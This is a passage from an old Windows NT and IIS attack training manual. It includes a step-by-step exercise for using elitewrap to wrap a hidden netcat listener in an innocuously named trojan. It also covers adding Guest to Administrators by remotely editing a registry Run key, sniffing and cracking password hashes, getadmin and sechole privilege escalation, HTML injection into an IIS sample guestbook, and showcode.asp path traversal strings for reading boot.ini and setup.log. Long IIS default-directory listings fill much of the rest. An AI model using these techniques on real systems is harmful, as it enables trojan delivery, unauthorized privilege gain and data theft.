] one of the single-digit numbers from the
] operation list above.
[Explanation:
"1" (pack only) will cause the file to be packed into the archive, and
extracted into a temporary directory when the packfile is run. A program that
is executed from the packfile after this can then manipulate it. This method
should be used for storing data files that cannot be executed.

"2"-"5" (pack and execute) will cause the file to be packed into the archive
and executed when the packfile is run. You can choose to start the program
visible or invisible, asynchronously (the packfile self-extractor will
continue when this program is running) or synchronously (execution of the
packfile will be stopped until this program has finished).

"6"-"9" (execute only) will NOT store the file in the packfile, but rely on
the file existing on the user's system - it could be an integral system
utility, like "notepad.exe", or it could have been extracted earlier. The
program will search the following places, in the following order, for these
files:
Current directory
Directory from where the packfile was started
System directories (NT uses 32-bit then 16-bit system directories)
Windows directory
All directories specified in the PATH environment variable

IMPORTANT: If you wish to pack and execute the same file twice or more in the
archive you must use an option from 2-5 the first time, and 6-9 subsequent
times. The file will already have been extracted, and so will be reused. Not
only does this save disk space, but specifying the same filename twice will
not work if the file is open (i.e. the program is running) the second time
the file is extracted. ]

Enter command line: ] If you specified an option "2"-"9" then


] you will be prompted for a command line.
] This is an appended to the filename to
] form a complete command that will be
] executed. This could be used for starting
] WINHELP.EXE with your help file, for
] example. This is optional. Press Enter to
] skip this option.

Enter package file #2: ] You will now be asked for another file,
] then another, and so on. You can just
] press Enter at one of these prompts to
] stop adding files.

With many features, elitewrap makes an excellent trojan delivery tool for Windows NT.

32
Using Elitewrap, create a trojan program. As an exercise, create an executable that launches
netcat listening on a port:

Tips:

• Use asynchronous execution


• Hide the execution of the program
• You will need the netcat executable (NT version) on your local machine

Steps:

1. Run the elitewrap program

Enter name of output file:

2. Choose a name for your executable program. Use something innocuous.

Operations: 1 - Pack only


2 - Pack and execute, visible, asynchronously
3 - Pack and execute, hidden, asynchronously
4 - Pack and execute, visible, synchronously
5 - Pack and execute, hidden, synchronously
6 - Execute only, visible, asynchronously
7 - Execute only, hidden, asynchronously
8 - Execute only, visible, synchronously
9 - Execute only, hidden, synchronously

Enter package file #1:

3. Package file 1 should be the netcat program, nc.exe

Enter operation:

4. Select the option for “Pack and execute, hidden, asynchronously “

Enter command line:

5. Enter the nc.exe command line listed above to create a telnet server.

Enter package file #1:

6. Press enter to quit

All done :)

Now, try executing your trojan program. Can you see the output? Can you telnet into your own
machine on port 99? What other commands can you trojan that might help gain more privs?

33
Remote Attacks

Remote registry updates

Under Windows NT 4.0 Server/Workstation SP4, the registry key


HKLM\software\Microsoft\Windows\CurrentVersion\Run has the “Everyone:set
value” permission set by default. This key’s values denote a list of programs that are executed
whenever any user logs in at the console. This key can be updated remotely if you have the
proper registry permissions (NT Server and Workstation set them by default, PDCs and BDCs do
not) and if you have a user account that is a member of the “everyone” group.

Connect to the remote machine as your captured account. A null connection won’t work.

Then, using regread, we can dump a vulnerable registry’s contents remotely:

Regdmp (from the NT Resource Kit) works similarly:

A properly protected registry elicits this response:

REGDMP: Unable to open key '\registry\machine' (5)

34
However, it's much more interesting to set this key using regini:

The file regtest.ini contains the registry key and the values to add. In this case, this command will
add the Guest user to the Administrators group.

Notes: All commands in the run key execute in parallel, not serially. Don’t insert any commands
that need to be run in any certain order, as the order can not be guaranteed. For example, don’t
do a net user /add and a net localgroup /add, as the localgroup command will run faster (and fail)
the first time it is run.

35
Password Sniffing

Much like UNIX, Windows passwords can be sniffed. Unlike standard UNIX applications,
however, Microsoft generally encodes passwords as they cross the wire. This encoded password
(or actually the hash of the password) can certainly be sniffed off the wire.

To make matters worse, this authentication information is sent more frequently than one might
think. Every time a user browses for resources, a NULL connection is first attempted to that
resource. If that authentication fails, that user’s username and password is transmitted to the
remote host in a second attempt to authenticate. Network browsing occurs every time a user
enters the “Network Neighborhood” desktop application.

A tool written by the l0pht (http://www.l0pht.com) called “l0phtcrack” was written to dictionary
attack, or even brute force this encoded text.

A Hydra support tool, “readpwd” has been developed to sniff these encoded strings, and
subsequently ouput them in a l0phtcrack-readable format.

This sniffer runs at the command line, and when used with the –o option, stores this data in a file
for import into l0phtcrack.(See the section on running l0phtcrack)

36
Password Cracking – L0phtcrack

L0phtcrack is generally run from the Windows-based GUI:

In order to run L0phtcrack, you should have a decent dictionary, as well encrypted password
strings. The readpwd tool outputs these strings as sniffed from the wire. Optionally, l0phtcrack
allows you to dump passwords from a remote machine. This requires Administrator access on the
remote machine.

37
Once you have opened a dictionary and a compatible list of encrypted passwords, you can set
the options for the crack. Lanman passwords are case insensitive, NTLM passwords are case
sensitive. The hybrid crack adds characters to your dictionary words. Brute force will brute-force
the entire keyspace, and can take a log time!

Once passwords have been cracked, l0phtcrack will display them to the user:

38
Local Advancement Attacks

GETADMIN

From the “www.ntsecurity.com” review of getadmin:

“The program, developed by Konstantin Sobolev, runs in a command window and adds the
specified user account to the Administrators group. No special permissions are required to
execute the program - which also works through a telnet session.

…the program works on a Primary Domain Controller (PDC), and will add local domain accounts
to the Administrators group.

This utility also works well against domain accounts. We were able to add users from a another
domain into the Administrators group of the local machine.

We tested the program using "getadmin username" and "getadmin DOMAIN-NAME\username".


Both of these variations in command syntax worked, which could indicate several other
configurations where this program might also work.”

With access to a standard user account, the getadmin program can be used to get Administrator-
level privileges.

39
“SECHOLE”

From the “www.ntsecurity.com” review of sechole:

“The following describes how any normal (non-administrative) user on a Windows NT


system can instantly gain administrative control for the entire machine by running a
simple executable program.

Requirements: You need to have a machine running the retail/free build of Windows NT
4.0, 3.51, or even Windows NT 5.0 beta -- either Workstation or Server will do.

1. Login on your NT machine: Login as any non-admin user on the machine (even guest
account will do). You may verify that the logged in user does not possess admin privilege
at this time by trying to run the "windisk" program from the shell. This should fail since the
user does not have admin privilege.

2. Copy: After logging in, copy the software (sechole.exe and admindll.dll) onto your hard
disk in any directory that allows you write and execute access.

3. Run SecHole.Exe: After running the program, your system might become unstable or
possibly lock up.

4. Reboot the machine if necessary: You will see that the non-admin user now belongs to
the Administrators group. This means that the user has complete admin control over that
machine -- for instance, you will be able to run programs like "windisk", create new users,
delete existing users, install drivers, even format hard disks.

FURTHER COMMENTS FROM THE AUTHORS:

SECHOLE.EXE is designed only to work on the workstation/server machine it is


executed on. Using the same technique, it is possible to gain domain-level Administrator
control over the entire Windows NT network, provided certain other conditions are met.
The example program SECHOLE.EXE is not designed to demonstrate this additional
vulnerability.”

The sechole program is another example of a way to advance from user to administrator.
However, this particular exploit can cause instability in the target system, so use with caution!

40
Application Attacks

Microsoft Internet Information Server 3.0

Information Gathering (IG)

Standard IG techniques can be employed against IIS, including web crawling and data mining.
Web crawling software such as Web Snake and Black Widow provides a means for automated
link traversal, and site mirroring. Automated site traversal simply loads a starting page
(index.html,default.htm) and recursively follows all links found on the main page, keeping a record
of all returned information. Site mirroring works in a similar fashion, the exception being that a
mirror will make a local copy of all references on a site. These techniques can be used to:
Collect keywords from a site, and feed those keywords into a database for a larger scale Internet
IG session including HTTP, SMTP, FTP and InterNIC services
Determine what CGI scripts are being used on a site without “read” access to the scripts directory
Determine the complete directory structure of a site

When IIS is installed, several “sample” programs are installed by default. Generally, these files
are not removed, even if a site has implemented an entirely new web presence. These “sample”
files can be called by using direct URL references, even if the sample pages are not linked to the
new site. Some of these files can be used to gather information about the site, while others
provide other interesting features.

http://www.0wned.org/samples/isapi/srch.htm

This sample search engine searches the entire web site, including both the default IIS
directories, as well as any files that were installed after IIS was stood up. This allows you
to search for non-public html documents, and even backup files. Use this engine to
discover documents to use as new web crawling sources. Note that the default
configuration of this engine will not return any data for searches resulting in more than
250 hits.

http://www.0wned.org/iisadmin/default.htm:

This is the URL for the IIS Internet Service Manager. This enables remote control of all
the IIS services including WWW, Gopher and FTP. In order to select a service to
administer, you must first authenticate against the server. I am still investigating how the
authentication works. Simply having the iisadmin utility there may not be enough, as
Administratator can not always log in remotely.

http://www.0wned.org/default.htm

This is the default page for IIS. Generally, sites will stand up an “index.html” document as
the default, so this page will still be accessible through direct URL reference. All of the
sample html pages, and the iisadmin utility can be referenced from this page if it exists.

http://www.0wned.org/samples/isapi/favlist.htm

This is one of the default applications IIS installs for you.


This particular page presents a “guestbook” type of input for
with fields for a URL, a description, and your name. Once the
text is entered, and processed by

41
http://www.0wned.org/scripts/samples/favlist.dll the user has the option
of viewing their entry in the appended “logbook” which sits by default at
http://www.0wned.org/samples/isapi/drop.htm. The favlist.dll application is
interesting in that it will gleefully insert your text into an HTML document in the following
fashion:

<b>Description:</b>Your text here<br>

Using the favlist.htm front-end to favlist.dll, a user can simply insert their own HTML tags
and text into the the fields, and the drop.htm screen will display them as HTML, not text.
For example, if the user were to enter ‘<A HREF=”www.playboy.com”>Click Here
For Cool Stuff</A>’ into the description field, the drop.htm would show a link,
which if clicked, would take the user to www.playboy.com. This simple manipulation
allows the user to create entire web pages, which could be accessed through the
drop.htm reference.

42
IIS 3.0 WWW Server Default Files and Directories:

Volume in drive D has no label.


Volume Serial Number is 906C-EA32
Directory of D:\InetPub\wwwroot

01/19/99 08:24a <DIR> .


01/19/99 08:24a <DIR> ..

10/13/96 08:38p 4,051 default.htm


01/08/99 07:58a <DIR> samples
4 File(s) 4,051 bytes

Directory of D:\InetPub\wwwroot\samples

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
01/08/99 07:58a <DIR> dbsamp
10/13/96 08:38p 4,051 default.htm
10/13/96 08:38p 838 disclaim.htm
01/08/99 07:58a <DIR> gbook
01/08/99 07:58a <DIR> htmlsamp
01/08/99 07:58a <DIR> images
01/08/99 07:58a <DIR> isapi
01/08/99 07:58a <DIR> sampsite
10 File(s) 4,889 bytes

Directory of D:\InetPub\wwwroot\samples\dbsamp

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
10/13/96 08:38p 5,150 dbsamp.htm
10/13/96 08:38p 583 dbsamp1.htm
10/13/96 08:38p 743 dbsamp2.htm
10/13/96 08:38p 762 dbsamp3.htm
6 File(s) 7,238 bytes

Directory of D:\InetPub\wwwroot\samples\gbook

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
10/13/96 08:38p 1,547 query.htm
10/13/96 08:38p 1,643 register.htm
4 File(s) 3,190 bytes

Directory of D:\InetPub\wwwroot\samples\htmlsamp

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
10/13/96 08:38p 1,598 htmlsamp.htm
10/13/96 08:38p 2,084 styles.htm
10/13/96 08:38p 1,483 styles2.htm
10/13/96 08:38p 1,393 tables.htm
6 File(s) 6,558 bytes

43
Directory of D:\InetPub\wwwroot\samples\images

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
10/13/96 08:38p 10,282 backgrnd.gif
10/13/96 08:38p 982 bullet_d.gif
10/13/96 08:38p 972 bullet_h.gif
10/13/96 08:38p 978 bullet_p.gif
10/13/96 08:38p 987 bullet_s.gif
10/13/96 08:38p 983 bullet_t.gif
10/13/96 08:38p 4,244 db_mh.gif
10/13/96 08:38p 174 db_mh.map
10/13/96 08:38p 2,893 docs.gif
10/13/96 08:38p 4,048 html_mh.gif
10/13/96 08:38p 182 html_mh.map
10/13/96 08:38p 3,037 h_browse.gif
10/13/96 08:38p 5,081 h_logo.gif
10/13/96 08:38p 6,060 h_samp.gif
10/13/96 08:38p 239 h_samp.map
10/13/96 08:38p 3,256 mh2.gif
10/13/96 08:38p 5,701 mh_data.gif
10/13/96 08:38p 201 mh_data.map
10/13/96 08:38p 5,834 mh_html.gif
10/13/96 08:38p 197 mh_html.map
10/13/96 08:38p 5,530 mh_prog.gif
10/13/96 08:38p 203 mh_prog.map
10/13/96 08:38p 5,556 mh_sampl.gif
10/13/96 08:38p 282 mh_sampl.map
10/13/96 08:38p 2,758 powered.gif
10/13/96 08:38p 4,406 p_mh.gif
10/13/96 08:38p 170 p_mh.map
10/13/96 08:38p 844 space.gif
10/13/96 08:38p 824 space2.gif
10/13/96 08:38p 2,513 tools.gif
10/13/96 08:38p 3,990 t_mh.gif
10/13/96 08:38p 134 t_mh.map
34 File(s) 83,541 bytes

Directory of D:\InetPub\wwwroot\samples\isapi

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
01/13/99 04:54p 2,541 drop.htm
10/13/96 08:38p 1,065 favlist.htm
10/13/96 08:38p 1,249 isapi.htm
10/13/96 08:38p 634 srch.htm
6 File(s) 5,489 bytes

Directory of D:\InetPub\wwwroot\samples\sampsite

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
10/13/96 08:38p 2,729 about.htm
01/08/99 07:58a <DIR> avi
10/13/96 08:38p 15,768 balo.wav
10/13/96 08:38p 2,522 catalog.htm
10/13/96 08:38p 3,039 default.htm

44
10/13/96 08:38p 70,916 drums.wav
01/08/99 07:58a <DIR> images
10/13/96 08:38p 1,602 process.htm
10/13/96 08:38p 1,517 results.htm
10/13/96 08:38p 1,066 sampsite.htm
10/13/96 08:38p 1,567 sendme.htm
10/13/96 08:38p 2,061 taste.htm
14 File(s) 102,787 bytes

Directory of D:\InetPub\wwwroot\samples\sampsite\avi

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
10/13/96 08:38p 58,094 cup.avi
10/13/96 08:38p 6,039 cupalt.gif
10/13/96 08:38p 4,799 grindalt.gif
10/13/96 08:38p 88,828 grinder.avi
10/13/96 08:38p 4,688 sampalt.gif
10/13/96 08:38p 88,522 sample.avi
8 File(s) 250,970 bytes

Directory of D:\InetPub\wwwroot\samples\sampsite\images

01/08/99 07:58a <DIR> .


01/08/99 07:58a <DIR> ..
10/13/96 08:38p 2,833 aboutsm.gif
10/13/96 08:38p 5,857 bag2.gif
10/13/96 08:38p 2,693 catsm.gif
10/13/96 08:38p 3,899 cup.gif
10/13/96 08:38p 6,563 gift2.gif
10/13/96 08:38p 7,983 habout.gif
10/13/96 08:38p 7,800 hcatalog.gif
10/13/96 08:38p 32,777 headersm.gif
10/13/96 08:38p 8,312 hproc.gif
10/13/96 08:38p 9,605 hsend.gif
10/13/96 08:38p 7,251 htaste.gif
10/13/96 08:38p 1,330 location.gif
10/13/96 08:38p 2,660 mainsm.gif
10/13/96 08:38p 5,893 mug2.gif
10/13/96 08:38p 3,190 procsm.gif
10/13/96 08:38p 2,192 search.gif
10/13/96 08:38p 4,503 sendsm.gif
10/13/96 08:38p 2,267 tastesm.gif
10/13/96 08:38p 14,772 tiled.gif
10/13/96 08:38p 657 time.gif
10/13/96 08:38p 3,273 voltiny.gif
23 File(s) 136,310 bytes

Total Files Listed:


116 File(s) 605,023 bytes
534,112,256 bytes free

45
IIS 3.0 WWW Default Service Properties

Services
TCP Port 80
Conection Timeout 900
Maximum Connections 100000
Anonymous Username IUSR_<MACHINENAME>
Anonymous Password <RANDOM>
Allow Anonymous <Selected>
Basic (Clear Text) <Unselected>
Windows NT Challenge/Response <Selected>
Comment <NONE>

Directories
Directory Alias
\InetPub\wwwroot <HOME> (Read)
\InetPub\scripts /scripts (Execute)
\WINNT\System32\inetsrv\iisadmin /iisadmin (Read)
Enable Default Document <Selected>
Default Document Default.htm
Directory Browsing Allowed <Unselected>

Logging
Enable Logging <Selected>
Log to File <Selected>
Log Format Standard Format
Automatically open new log <Selected> (Daily)
Log File Directory \WINNT\System32\Log
Files
Log to SQL Database <Unselected>
Log File Name INyymmdd.log

Advanced
By Default, all computers will be Granted Access
Except those listed below <BLANK>
Limit Network Use by all Internet <Unselected>
Services on this computer

46
IIS 3.0 FTP Default Service Properties

Services
TCP Port 21
Conection Timeout 900
Maximum Connections 1000
Allow Anonymous Connections <Selected>
Anonymous Username IUSR_<MACHINENAME>
Anonymous Password <RANDOM>
Allow Only Anonymous Connections <Selected>
Comment <NONE>

Messages
Welcome Message <NONE>
Exit Message <NONE>
Maximum Connections Message <NONE>

Directories
Directory Alias
\InetPub\ftproot <HOME> (Read)
Directory Listing Style <UNIX>

Logging
Enable Logging <Selected>
Log to File <Selected>
Log Format Standard Format
Automatically open new log <Selected> (Daily)
Log File Directory \WINNT\System32\Log
Files
Log to SQL Database <Unselected>
Log File Name INyymmdd.log

Advanced
By Default, all computers will be Granted Access
Except those listed below <BLANK>
Limit Network Use by all Internet <Unselected>
Services on this computer

47
IIS 3.0 Gopher Default Service Properties

Services
TCP Port 70
Conection Timeout 900
Maximum Connections 1000
Service Administrator Administrator
Email Admin@corp.com
Anonymous Username IUSR_<MACHINENAME>
Anonymous Password <RANDOM>
Comment <NONE>

Directories
Directory Alias
\InetPub\gophroot <HOME>

Logging
Enable Logging <Selected>
Log to File <Selected>
Log Format Standard Format
Automatically open new log <Selected> (Daily)
Log File Directory \WINNT\System32\Log
Files
Log to SQL Database <Unselected>
Log File Name INyymmdd.log

Advanced
By Default, all computers will be Granted Access
Except those listed below <BLANK>
Limit Network Use by all Internet <Unselected>
Services on this computer

48
Microsoft Internet Information Server 4.0

IIS Remote Overflow

The IIS server has a remote overflow in version 4.0 that allows remote system access.
Jimmy has ported this exploit, termed “iishack” to Linux. The exploit launches the netcat
executable on the remote machine as the “System” user.

<Insert Jimmy’s Document here>

Just like release 3.0 of IIS, several “sample” programs are installed by default. Generally,
these files are not removed, even if a site has implemented an entirely new web
presence. These “sample” files can be called by using direct URL references, even if the
sample pages are not linked to the new site. Some of these files can be used to gather
information about the site, while others provide other interesting features.

http://www.someserver.com/msadc/Samples/SELECTOR/showcode.asp

Showcode.asp is a utility that shows the source code of an asp file. An attacker can
implement this utility with the “..” style attack to view any file on the server. Standard
ACL’s still apply, and the web user will be allowed to view any file that his ACL allows him
to. This is all covered in a L0pht advisory
(http://www.l0pht.com/advisories.html).

?source=/msadc/Samples/../../../../../boot.ini

This parameter appended to the URL above will show the boot.ini file.

?source=/msadc/Samples/../../../../../winnt/repair/setup.log

This parameter appended to the showcode.asp command will show the setup.log file.

Several other nuances of this command can be leveraged to gather information from the
server. While the showcode.asp will not show directory listings, the error codes seem to
indicate an avenue for testing the existence of a directory:

?source=/msadc/Samples/../../../../../winnt/repaire

This parameter will elicit an error code of “Server object error 'ASP 0177 : 800a0035'”
(The directory doesn’t exist)

?source=/msadc/Samples/../../../../../winnt/repair

This parameter will elicit an error code of “Server object error 'ASP 0177 : 800a0046'”
(The directory exists)

IIS 4.0 WWW Server Default Files and Directories:

Volume in drive C has no label.


Volume Serial Number is EA37-8613

49
Directory of C:\INETPUB

05/12/99 03:07p <DIR> .


05/12/99 03:07p <DIR> ..
05/12/99 03:07p <DIR> Mailroot
05/12/99 03:08p <DIR> wwwroot
05/12/99 03:09p <DIR> iissamples
05/12/99 03:14p <DIR> Mail
05/12/99 03:17p <DIR> scripts
05/12/99 03:18p <DIR> ftproot
05/12/99 03:18p <DIR> Catalog.wci
05/14/99 03:38p 0 dirlist.txt
10 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot

05/12/99 03:07p <DIR> .


05/12/99 03:07p <DIR> ..
05/12/99 03:18p <DIR> Queue
05/12/99 03:18p <DIR> Badmail
05/12/99 03:18p <DIR> Drop
05/12/99 03:18p <DIR> Pickup
05/12/99 03:18p <DIR> SortTemp
05/12/99 03:18p <DIR> Route
05/12/99 03:18p <DIR> Mailbox
9 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Queue

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Badmail

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Drop

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Pickup

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\SortTemp

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

50
Directory of C:\INETPUB\Mailroot\Route

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\Mailroot\Mailbox

05/12/99 03:18p <DIR> .


05/12/99 03:18p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot

05/12/99 03:08p <DIR> .


05/12/99 03:08p <DIR> ..
05/12/99 03:23p 4,663 default.asp
05/12/99 03:23p 2,504 postinfo.html
05/12/99 03:23p <DIR> _private
05/12/99 03:23p <DIR> cgi-bin
05/12/99 03:23p <DIR> images
05/12/99 03:23p 1,759 _vti_inf.html
8 File(s) 8,926 bytes

Directory of C:\INETPUB\wwwroot\_vti_pvt

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
05/12/99 03:23p 0 service.lck
05/12/99 03:23p 582 service.cnf
05/12/99 03:23p 25 access.cnf
05/12/99 03:23p 3 services.cnf
05/12/99 03:23p 25 bots.cnf
05/12/99 03:23p 25 botinfs.cnf
05/12/99 03:23p 5,616 doctodep.btr
05/12/99 03:23p 324 deptodoc.btr
05/12/99 03:23p 25 writeto.cnf
05/12/99 03:23p 600 linkinfo.cnf
12 File(s) 7,225 bytes

Directory of C:\INETPUB\wwwroot\_vti_log

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\_private

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\wwwroot\_vti_txt

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
2 File(s) 0 bytes

51
Directory of C:\INETPUB\wwwroot\_vti_cnf

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
05/12/99 03:23p 985 default.asp
3 File(s) 985 bytes

Directory of C:\INETPUB\wwwroot\_vti_bin

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
05/12/99 03:23p 107,008 fpcount.exe
05/12/99 03:23p 14,608 shtml.dll
4 File(s) 121,616 bytes

Directory of C:\INETPUB\wwwroot\_vti_bin\_vti_adm

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
05/12/99 03:23p 15,120 admin.dll
3 File(s) 15,120 bytes

Directory of C:\INETPUB\wwwroot\_vti_bin\_vti_aut

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
05/12/99 03:23p 6,416 dvwssr.dll
05/12/99 03:23p 15,120 author.dll
4 File(s) 21,536 bytes

Directory of C:\INETPUB\wwwroot\cgi-bin

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
05/12/99 03:23p 7,952 htimage.exe
05/12/99 03:23p 6,416 imagemap.exe
4 File(s) 14,368 bytes

Directory of C:\INETPUB\wwwroot\cgi-bin\_vti_cnf

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
05/12/99 03:23p 216 htimage.exe
05/12/99 03:23p 216 imagemap.exe
4 File(s) 432 bytes

Directory of C:\INETPUB\wwwroot\images

05/12/99 03:23p <DIR> .


05/12/99 03:23p <DIR> ..
2 File(s) 0 bytes

Directory of C:\INETPUB\iissamples

05/12/99 03:09p <DIR> .


05/12/99 03:09p <DIR> ..

52
05/12/99 03:09p <DIR> default
05/12/99 03:14p <DIR> ISSamples
4 File(s) 0 bytes

Directory of C:\INETPUB\iissamples\default

05/12/99 03:09p <DIR> .


05/12/99 03:09p <DIR> ..
08/07/97 04:10p 8,609 ie.gif
08/07/97 04:10p 388 msft.gif
09/05/97 09:16a 15,076 iisnav.gif
10/12/97 07:17a 14,687 IISSide.gif
09/08/97 07:31a 21,318 iistitle.gif
10/25/97 08:31a 10,170 learn.asp
09/05/97 09:16a 1,911 nav2.gif
10/25/97 08:31a 6,001 samples.asp
09/05/97 09:16a 2,471 squiggle.gif
11 File(s) 80,631 bytes

Directory of C:\INETPUB\iissamples\ISSamples

05/12/99 03:14p <DIR> .


05/12/99 03:14p <DIR> ..
10/14/97 07:06a 11,264 ixgerman.doc
10/14/97 07:06a 16,384 ixserver.doc
10/14/97 07:06a 56,320 ixserver.ppt
10/14/97 07:06a 40,960 ixserver.xls
10/09/97 12:57p 7,438 adovbs.inc
10/14/97 07:06a 18,636 advquery.asp
10/14/97 07:06a 18,431 advsqlq.asp
10/09/97 12:57p 252 default.htm
10/09/97 12:57p 594 deferror.htx
10/14/97 04:48p 3,727 fastq.htm
10/14/97 07:06a 4,521 fastq.htx
10/14/97 04:48p 4,153 fastq.idq
10/14/97 07:06a 902 hilight.gif
10/09/97 12:57p 579 htxerror.htx
10/09/97 12:57p 576 idqerror.htx
10/14/97 07:06a 1,131 is2bkgnd.gif
10/14/97 04:48p 883 is2foot.inc
10/14/97 07:06a 14,830 is2logo.gif
10/14/97 07:06a 17,824 is2side.gif
10/14/97 07:06a 1,953 is2style.css
10/14/97 07:06a 8,609 ie.gif
10/21/97 03:09a 42,069 ixqlang.htm
10/21/97 03:09a 4,314 ixtiphlp.htm
10/14/97 07:06a 4,496 ixtipsql.htm
10/09/97 12:57p 8,276 ixtrasp.asp
10/09/97 12:57p 1,279 navbar.htm
10/14/97 07:06a 10,646 nts_iis.gif
05/12/99 03:14p <DIR> oop
10/21/97 03:09a 14,749 query.asp
10/21/97 03:09a 4,301 query.htm
10/14/97 07:06a 11,458 query.htx
10/14/97 07:06a 3,520 query.idq
10/14/97 07:06a 998 rankbtn1.gif
10/14/97 07:06a 1,088 rankbtn2.gif

53
10/14/97 07:06a 1,165 rankbtn3.gif
10/14/97 07:06a 1,230 rankbtn4.gif
10/14/97 07:06a 1,301 rankbtn5.gif
10/09/97 12:57p 597 reserror.htx
10/14/97 07:06a 3,633 sqlqhit.asp
10/14/97 07:06a 5,984 sqlqhit.htm
42 File(s) 351,071 bytes

Directory of C:\INETPUB\iissamples\ISSamples\oop

05/12/99 03:14p <DIR> .


05/12/99 03:14p <DIR> ..
10/14/97 04:48p 2,600 qfullhit.htw
10/14/97 04:48p 2,249 qsumrhit.htw
4 File(s) 4,849 bytes

Directory of C:\INETPUB\Mail

05/12/99 03:14p <DIR> .


05/12/99 03:14p <DIR> ..
05/12/99 03:14p <DIR> Smtp
3 File(s) 0 bytes

Directory of C:\INETPUB\Mail\Smtp

05/12/99 03:14p <DIR> .


05/12/99 03:14p <DIR> ..
05/12/99 03:14p <DIR> Admin
3 File(s) 0 bytes

Directory of C:\INETPUB\Mail\Smtp\Admin

05/12/99 03:14p <DIR> .


05/12/99 03:14p <DIR> ..
10/05/97 04:27a 12,001 smtpread.txt
05/12/99 03:14p <DIR> Help
10/12/97 06:40a 286 global.asa
10/12/97 06:40a 58 blank.htm
10/12/97 06:40a 142 default.htm
10/12/97 06:40a 2,400 nre.asp
10/12/97 06:40a 159 nyi.htm
10/20/97 02:26a 1,444 smabout.asp
10/15/97 03:07a 10,019 smaccess.asp
10/12/97 06:40a 1,089 smadv.asp
10/12/97 06:40a 1,632 smadvbd.asp
10/12/97 06:40a 7,697 smadved.asp
10/22/97 06:31a 16,876 smadvhd.asp
10/20/97 02:26a 16,942 smadvhd.asp.2
10/12/97 06:40a 7,860 smadvls.asp
10/16/97 02:53a 8,686 smau.asp
10/12/97 06:40a 5,799 smbld.asp
10/12/97 06:40a 498 smchklen.htm
10/12/97 06:40a 7,528 smcomm.asp
10/12/97 06:40a 1,645 smcon.asp
10/12/97 06:40a 3,533 smconn.asp
10/20/97 02:26a 12,683 smdel.asp
10/12/97 06:40a 4,080 smdistb.asp

54
10/12/97 06:40a 716 smdom.asp
10/20/97 02:26a 35,570 smdomed.asp
10/19/97 02:26a 11,149 smdomhd.asp
10/12/97 06:40a 1,485 smdomls.asp
10/12/97 06:40a 389 smeredir.asp
10/12/97 06:40a 4,702 smerrors.asp
10/12/97 06:40a 829 smfpop.asp
10/12/97 06:40a 358 smgetval.htm
10/20/97 02:26a 3,033 smhd.asp
10/12/97 06:40a 253 smisfull.htm
10/12/97 06:40a 361 smisnum.htm
10/12/97 06:40a 592 smlist.asp
10/18/97 02:17a 13,696 smmes.asp
10/16/97 02:53a 21,510 smmnu.asp
10/12/97 06:40a 2,263 smmnums.asp
10/12/97 06:40a 2,053 smmnuns.asp
10/12/97 06:40a 595 smmnus.asp
10/20/97 02:26a 12,805 smosec.asp
10/12/97 06:40a 230 smpop.asp
10/12/97 06:40a 225 smpophd.asp
10/12/97 06:40a 1,594 smredir.asp
10/15/97 03:07a 3,397 smsec.asp
10/17/97 02:20a 16,833 smser.asp
10/12/97 06:40a 712 smses.asp
10/12/97 06:40a 8,168 smseshd.asp
10/12/97 06:40a 2,282 smsesls.asp
10/12/97 06:40a 390 smsetval.htm
10/12/97 06:40a 938 smslist.asp
10/12/97 06:40a 4,380 smsrv.asp
10/12/97 06:40a 734 smstat.asp
10/12/97 06:40a 10,954 smtl.asp
10/19/97 02:26a 3,344 smtp.asp
10/15/97 03:07a 7,995 smtree.asp
10/12/97 06:40a 10,528 smvs.asp
10/12/97 06:40a 2,060 srtb.asp
10/12/97 06:40a 60 version.htm
10/12/97 06:40a 338 _cnst.asp
05/12/99 03:14p <DIR> Images
63 File(s) 310,578 bytes

Directory of C:\INETPUB\Mail\Smtp\Admin\Help

05/12/99 03:14p <DIR> .


05/12/99 03:14p <DIR> ..
10/18/97 02:14a 63,029 smtpsnap.hlp
10/07/97 02:56a 344 smtpsnap.cnt
10/07/97 02:56a 29,331 smtpcfg.hlp
10/12/97 06:40a 1,681 sec128.htm
10/12/97 06:40a 1,525 secchan.htm
10/12/97 06:40a 1,115 sesdall.htm
10/12/97 06:40a 1,151 sesdisc.htm
10/12/97 06:40a 931 sesfrom.htm
10/12/97 06:40a 937 sesnext.htm
10/12/97 06:40a 952 sesprev.htm
10/12/97 06:40a 1,103 sesrfrsh.htm
10/12/97 06:40a 958 sestime.htm
10/12/97 06:40a 978 sesuser.htm

55
10/18/97 02:17a 4,131 smadvh.htm
